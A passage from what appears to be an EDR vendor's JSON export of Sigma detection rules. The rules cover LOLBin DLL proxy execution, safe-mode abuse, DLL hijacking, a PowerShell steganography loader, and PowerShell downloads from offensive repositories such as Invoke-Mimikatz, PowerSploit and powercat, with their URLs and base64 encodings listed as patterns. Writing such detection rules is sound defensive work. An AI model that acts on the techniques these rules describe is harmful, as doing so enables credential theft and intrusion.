"creation_date": "2026-03-23T11:45:34.615249Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.615256Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Rasautou/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_rasautou_execution_proxy.yml",
"content": "title: DLL Loaded via Rasautou.exe\nid: 1f5a2648-0258-4ffe-93b8-f4aa01a21d2c\ndescription: |\n Detects a malicious use of Rasautou.exe to load an arbitrary DLL file.\n Adversaries may use specific flags to load and execute arbitrary DLLs within Rasautou.exe and bypass security restrictions.\n It has to be noted that Microsoft has removed those parameters starting with Windows 10, therefore only older versions are impacted.\n It is recommended to check for suspicious activity from the executed process and its parents.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Rasautou/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2024/03/18\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rasautou\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'rasdlui.exe'\n CommandLine|contains|all:\n - '-d'\n - '-p'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f5a2648-0258-4ffe-93b8-f4aa01a21d2c",
"rule_name": "DLL Loaded via Rasautou.exe",
"rule_description": "Detects a malicious use of Rasautou.exe to load an arbitrary DLL file.\nAdversaries may use specific flags to load and execute arbitrary DLLs within Rasautou.exe and bypass security restrictions.\nIt has to be noted that Microsoft has removed those parameters starting with Windows 10, therefore only older versions are impacted.\nIt is recommended to check for suspicious activity from the executed process and its parents.\n",
"rule_creation_date": "2024-03-18",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619770Z",
"creation_date": "2026-03-23T11:45:34.619773Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619777Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_w_macos.yml",
"content": "title: Current Logged In Users Discovered via W\nid: 1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48\ndescription: |\n Detects the execution of the w command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in and their last action on the system.\n It is recommended to check for other suspicious activity by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/w'\n ParentImage|contains: '?'\n\n exclusion_globalprotect:\n GrandparentImage: '/Applications/GlobalProtect.app/Contents/MacOS/GlobalProtect'\n\n exclusion_kaspersky:\n ParentImage: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f8de2c5-e4de-49b9-8e1e-9753cb9c3f48",
"rule_name": "Current Logged In Users Discovered via W",
"rule_description": "Detects the execution of the w command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in and their last action on the system.\nIt is recommended to check for other suspicious activity by the parent process.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1f9140ad-7310-4971-817e-bc52afe6b553",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087751Z",
"creation_date": "2026-03-23T11:45:34.087753Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087757Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/"
],
"name": "t1529_enable_safemode.yml",
"content": "title: Windows Safe-Mode Enabled\nid: 1f9140ad-7310-4971-817e-bc52afe6b553\ndescription: |\n Detects the activation of the Windows Safe-Mode.\n When restarted in Safe-Mode, many detection features are disabled.\n Attackers may enable Windows Safe-Mode to disable detection software and avoid detection.\n It is recommended to investigate the parent process to determine if this action was legitimate.\nreferences:\n - https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/\ndate: 2021/03/19\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1529\n - attack.t1542\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\bcdedit.exe'\n - OriginalFileName: 'bcdedit.exe'\n selection_2:\n CommandLine|contains|all:\n - '/set'\n - 'safeboot'\n selection_3:\n CommandLine|contains:\n - 'minimal'\n - 'network'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1f9140ad-7310-4971-817e-bc52afe6b553",
"rule_name": "Windows Safe-Mode Enabled",
"rule_description": "Detects the activation of the Windows Safe-Mode.\nWhen restarted in Safe-Mode, many detection features are disabled.\nAttackers may enable Windows Safe-Mode to disable detection software and avoid detection.\nIt is recommended to investigate the parent process to determine if this action was legitimate.\n",
"rule_creation_date": "2021-03-19",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1529",
"attack.t1542"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1fa76d65-e12e-4570-a4d7-bec1023044e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093760Z",
"creation_date": "2026-03-23T11:45:34.093762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093766Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfsdiag.yml",
"content": "title: DLL Hijacking via DfsDiag.exe\nid: 1fa76d65-e12e-4570-a4d7-bec1023044e3\ndescription: |\n Detects potential Windows DLL Hijacking via DfsDiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DfsDiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\netapi32.dll'\n - '\\resutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1fa76d65-e12e-4570-a4d7-bec1023044e3",
"rule_name": "DLL Hijacking via DfsDiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via DfsDiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1fdb3367-1225-4b9e-99c5-2a202390b38b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606938Z",
"creation_date": "2026-03-23T11:45:34.606941Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606949Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/techniques/T1027/003/"
],
"name": "t1059_001_powershell_steganography_loader.yml",
"content": "title: PowerShell Steganography Loader\nid: 1fdb3367-1225-4b9e-99c5-2a202390b38b\ndescription: |\n Detects a specific PowerShell command-line used to download a JPG image containing a hidden base64 encoded .NET payload using a simple steganography technique.\n The .NET assembly then downloads the final malware payload, a RAT such as Remcos, subsequently injecting, and initiating its malicious operation within the victim’s system.\n This action is often related to a phishing campaign.\n It is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\nreferences:\n - https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1027/003/\ndate: 2023/09/29\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1027.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains|all:\n - '<>'\n - '<>'\n - '[System.Convert]::FromBase64String('\n - '[System.Reflection.Assembly]::Load('\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1fdb3367-1225-4b9e-99c5-2a202390b38b",
"rule_name": "PowerShell Steganography Loader",
"rule_description": "Detects a specific PowerShell command-line used to download a JPG image containing a hidden base64 encoded .NET payload using a simple steganography technique.\nThe .NET assembly then downloads the final malware payload, a RAT such as Remcos, subsequently injecting, and initiating its malicious operation within the victim’s system.\nThis action is often related to a phishing campaign.\nIt is recommended to investigate, with the help of the process tree, the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2023-09-29",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1027.003",
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2029c7d2-ce99-4765-bef4-8aa8277d9a50",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092344Z",
"creation_date": "2026-03-23T11:45:34.092346Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092351Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_urls_script.yml",
"content": "title: URLs of Malicious Code Repository in PowerShell Script\nid: 2029c7d2-ce99-4765-bef4-8aa8277d9a50\ndescription: |\n Detects PowerShell scripts containing URLs that reference known malicious code or offensive tooling repositories.\n Threat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\n It is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack or ongoing malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/24\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains:\n - '/raw.githubusercontent.com/'\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n selection_2:\n PowershellCommand|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # /S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - '8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - '/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - '8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n - 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - '/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n # https://raw.githubusercontent.com/leoloobeek/LAPSToolkit/refs/heads/master/LAPSToolkit.ps1\n - '/leoloobeek/'\n - 'LwBsAGUAbwBsAG8AbwBiAGUAZQBrAC8A'\n - '8AbABlAG8AbABvAG8AYgBlAGUAawAvA'\n - 'vAGwAZQBvAGwAbwBvAGIAZQBlAGsALw'\n # https://raw.githubusercontent.com/sense-of-security/ADRecon/refs/heads/master/ADRecon.ps1\n - '/sense-of-security/'\n - 'LwBzAGUAbgBzAGUALQBvAGYALQBzAGUAYwB1AHIAaQB0AHkALw'\n - '8AcwBlAG4AcwBlAC0AbwBmAC0AcwBlAGMAdQByAGkAdAB5AC8A'\n - 'vAHMAZQBuAHMAZQAtAG8AZgAtAHMAZQBjAHUAcgBpAHQAeQAvA'\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-ADM.ps1\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-DS.ps1\n - '/Friends-Security/'\n - 'LwBGAHIAaQBlAG4AZABzAC0AUwBlAGMAdQByAGkAdAB5AC8A'\n - '8ARgByAGkAZQBuAGQAcwAtAFMAZQBjAHUAcgBpAHQAeQAvA'\n - 'vAEYAcgBpAGUAbgBkAHMALQBTAGUAYwB1AHIAaQB0AHkALw'\n # https://github.com/dafthack/GraphRunner\n # https://github.com/dafthack/MFASweep\n # https://github.com/dafthack/MailSniper\n - '/dafthack/'\n - 'LwBkAGEAZgB0AGgAYQBjAGsALw'\n - '8AZABhAGYAdABoAGEAYwBrAC8A'\n - 'vAGQAYQBmAHQAaABhAGMAawAvA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2029c7d2-ce99-4765-bef4-8aa8277d9a50",
"rule_name": "URLs of Malicious Code Repository in PowerShell Script",
"rule_description": "Detects PowerShell scripts containing URLs that reference known malicious code or offensive tooling repositories.\nThreat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\nIt is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack or ongoing malicious activity.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2097d94f-4a7d-417e-8cb0-063a71e4cd4c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591189Z",
"creation_date": "2026-03-23T11:45:34.591192Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591200Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_scriptrunner.yml",
"content": "title: DLL Hijacking via ScriptRunner.exe\nid: 2097d94f-4a7d-417e-8cb0-063a71e4cd4c\ndescription: |\n Detects potential Windows DLL Hijacking via ScriptRunner.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ScriptRunner.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n 